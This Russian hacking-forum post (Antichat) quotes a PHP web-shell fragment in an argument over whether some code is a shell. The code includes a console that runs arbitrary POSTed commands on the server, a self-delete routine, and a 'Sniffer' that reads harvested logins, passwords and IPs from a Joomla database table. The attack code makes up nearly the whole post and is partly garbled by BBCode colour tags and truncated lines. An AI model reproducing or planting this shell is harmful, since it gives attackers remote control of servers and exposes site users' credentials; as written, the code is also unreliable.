Форум АНТИЧАТ - Показать сообщение отдельно - Ваши вопросы по уязвимостям.

Цитата:
Сообщение от qaz
qaz said:
чёза бред ты тут сказал? может это вовсе не шелл,
вот кусок из шелла в конце база
PHP код:

		
			
PHP:
[COLOR="#000000"]function actionConsole() { if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); echo "document.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "document.mf.c.value='".$GLOBALS['cwd']."';"; } } echo "document.cf.output.value+='".$temp."';"; echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } printHeader(); ?>  if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(""); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur  [COLOR="#0000BB"]Console'[/COLOR][COLOR="#007700"]; foreach([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'aliases'[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"]) { if([/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) { echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; continue; } echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; } if(empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ajax'[/COLOR][COLOR="#007700"]])&&!empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p1'[/COLOR][COLOR="#007700"]]))[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]'ajax'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]; echo[/COLOR][COLOR="#DD0000"]'>">  send using AJAX
'[/COLOR][COLOR="#007700"]; if(!empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p1'[/COLOR][COLOR="#007700"]])) { echo[/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"$ "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p1'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ex[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p1'[/COLOR][COLOR="#007700"]])); } echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; echo[/COLOR][COLOR="#DD0000"]'document.cf.cmd.focus();'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]printFooter[/COLOR][COLOR="#007700"](); } function[/COLOR][COLOR="#0000BB"]actionLogout[/COLOR][COLOR="#007700"]() { unset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])]); echo[/COLOR][COLOR="#DD0000"]'bye!'[/COLOR][COLOR="#007700"]; } function[/COLOR][COLOR="#0000BB"]actionSelfRemove[/COLOR][COLOR="#007700"]() {[/COLOR][COLOR="#0000BB"]printHeader[/COLOR][COLOR="#007700"](); if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p1'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'yes'[/COLOR][COLOR="#007700"]) { if(@[/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]SELF_PATH[/COLOR][COLOR="#007700"])) die([/COLOR][COLOR="#DD0000"]'Shell has been removed'[/COLOR][COLOR="#007700"]); else echo[/COLOR][COLOR="#DD0000"]'unlink error!'[/COLOR][COLOR="#007700"]; } echo[/COLOR][COLOR="#DD0000"]'SuicideReally want to remove the shell?
Yes'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]printFooter[/COLOR][COLOR="#007700"](); } function[/COLOR][COLOR="#0000BB"]actionSniffer[/COLOR][COLOR="#007700"]() {[/COLOR][COLOR="#0000BB"]printHeader[/COLOR][COLOR="#007700"](); echo[/COLOR][COLOR="#DD0000"]'Sniffer'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'сдесь номер заказа.mysql.ihc.ru'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'сама база_db'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'сдесь прописан пользователь_db'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$passwd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'ну и пароль'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$passwd[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM jos_phocadownload_templates"[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]); echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]; for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&nbsp;Login:'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mysql_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'Pass:'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mysql_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]pass[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'IP:'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mysql_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ip[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'Date:'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mysql_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'id:'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mysql_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'referer:'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mysql_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ref[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]; echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]; echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]mysql_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]printFooter[/COLOR][COLOR="#007700"](); }[/COLOR][/COLOR]